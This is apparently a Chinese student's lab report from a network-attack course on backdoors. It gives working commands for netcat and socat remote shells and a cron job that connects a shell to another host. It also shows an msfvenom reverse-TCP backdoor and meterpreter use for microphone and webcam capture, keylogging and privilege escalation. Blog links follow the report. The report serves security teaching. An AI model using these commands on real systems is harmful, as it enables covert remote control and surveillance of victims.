Exp2 后门原理与实践

实验内容

一、使用netcat获取主机操作Shell,cron启动

使用netcat获取主机操作Shell

  • Win获得Linux Shell
  1. 查看win的ip地址

  2. windows 打开监听

  3. Linux反弹连接win

  4. windows下获得一个linux shell,可运行任何指令,如ls

  • Linux获得Win Shell
  1. 查看kali的ip地址

  2. Linux运行监听指令

  3. Windows反弹连接Linux

  4. Linux下看到Windows的命令提示

    kali_win.png

  • nc传输数据
  1. Windows下监听端口:

  2. Kali下连接到Windows的端口:

  3. 可以传输字符串。

cron启动

  1. 先在Windows系统下,监听5209端口:

  2. 在Kali环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。

  3. 用crontab -e指令编辑一条定时任务

  4. 在最后一行添加10 * * * * /bin/netcat 192.168.33.130 5209 -e /bin/sh。依据我做实验的时间,我将其设置在每小时的第十分钟。

  5. 当时间到了,此时已经获得了Kali的shell,可以输入指令

二、使用socat获取主机操作Shell, 任务计划启动

  • socat基本语法 socat [options]
  • 其中这2个address就是关键了,如果要解释的话,address就类似于一个文件描述符,socat所做的工作就是在2个address指定的描述符间建立一个pipe用于发送和接收数据。
  1. Windows->控制面板->管理工具->任务计划程序.执行上述步骤

  2. 新建一个触发器,选择当锁定任何用户的工作站时

  3. 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5209 exec:cmd.exe,pty,stderr

  4. 创建完成之后,按Windows+L快捷键锁定计算机

  5. 此时,在Kali环境下输入指令socat - tcp:10.1.1.141:5209。即可获得了一个cmd shell

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  1. 通过模仿命令
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe > meter_backdoor.exe

生成自己的后门程序。

2. 将生成的文件复制到win,我使用之前的nc指令将后门程序传到win。

  1. 在Kali上使用msfconsole指令进入msf控制台

  2. 进入handler模式

  3. 设置payload,设置LHOST,设置LPORT

  1. 全部设置完成之后,kali下开始监听,win下启动后门程序,kali下即获得win的shell

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  1. 使用record_mic指令可以截获一段音频:

  2. 使用webcam_snap指令可以使用摄像头进行拍照:

  1. 使用webcam stream指令可以使用摄像头进行录像

  2. 使用screenshot指令可以进行截屏:

  3. 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

  4. 先使用getuid指令查看当前用户,使用getsystem指令进行提权。但是结果显示提权失败,可能是使用的系统有问题。

基础问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?
  • 平时在网络上下载东西,其中可能包含后门程序。
  • 例举你知道的后门如何启动起来(win及linux)的方式?
  • 通过远程控制开启后门程序。
  • 使用定时任务,定时开启。
  • Meterpreter有哪些给你映像深刻的功能?
  • 我觉得最厉害的是可以提权,获得System权限,虽然我的提权实验没有成功。。。
  • 如何发现自己有的系统有没有被安装后门?
  • 通过杀毒软件进行杀毒

20155209 林虹宇Exp2 后门原理与实践的更多相关文章

  1. 20155209林虹宇逆向及Bof基础实验报告

    20155209林虹宇逆向及Bof基础实验报告 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符 ...

  2. 2018-2019 2 20165203 《网络对抗技术》 Exp2 后门原理与实践

    2018-2019 2 20165203 <网络对抗技术> Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获 ...

  3. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  4. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  5. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  6. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  7. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  8. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  9. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

随机推荐

  1. SD从零开始57-58,第三方订单处理,跨公司销售

    [原创] SD从零开始57 第三方订单处理流程 第三方订单处理的流程Processes for Third-Party Order Processing 客户的采购订单首先在你公司的一个销售组织作为一 ...

  2. Linux CentOS 6.5 + Apache + Mariadb + PHP环境搭建

    Web自动化测试-服务端测试环境部署 by:授客 目录 一. 二. 三. 四. 五. 六. 七. 八. 九. 十. 操作系统环境:CentOS 6.5-x86_64 下载地址:http://www.c ...

  3. Asp.net MVC检测到有潜在危险的 Request.Form 值

    解决方法很简单,不像网上说的那么麻烦.只需一步: [ValidateInput(false)] public ActionResult Test(){ }

  4. 8.1、包,__init__.py,

    包: 为了组织好模块,将多个模块组合为一个包,所以包用于存放python模块 包通常是一个文件夹,当文件夹当作包使用时,文件夹需要包含__init__.py文件 __init__.py的内容可以为空, ...

  5. MySQL——索引优化实战

    上篇文章中介绍了索引的基本内容,这篇文章我们继续介绍索引优化实战.在介绍索引优化实战之前,首先要介绍两个与索引相关的重要概念,这两个概念对于索引优化至关重要. 本篇文章用于测试的user表结构: 索引 ...

  6. The Downside of MySQL Auto-reconnect

    A few days ago I was doing some cleanup on a passive master database using the MySQL client. I didn’ ...

  7. 一、HttpServletRequest接口 二、HttpServletReponse接口 三、POST和GET请求方式及其乱码处理 四、ServletContext对象和ServletConfig对象

    一.HttpServletRequest接口 内部封装了客户端请求的数据信息 接收客户端的请求参数.HTTP请求数据包中配置参数 ###<1>常用方法 getContextPath()重要 ...

  8. WaitForMultipleObjects

    WaitForMultipleObjects是Windows中的一个功能非常强大的函数,几乎可以等待Windows中的所有的内核对象 函数原型为: DWORD WaitForMultipleObjec ...

  9. css常见知识点

    1.内核区分 希望某一个浏览器能一统江湖 -ms-transform:rotate(7deg); //-ms代表ie内核识别码 -moz-transform:rotate(7deg); //-moz代 ...

  10. java使用elasticsearch进行模糊查询-已在项目中实际应用

    java使用elasticsearch进行模糊查询 使用环境上篇文章本人已书写过,需要maven坐标,ES连接工具类的请看上一篇文章,以下是内容是笔者在真实项目中运用总结而产生,并写的是主要方法和思路 ...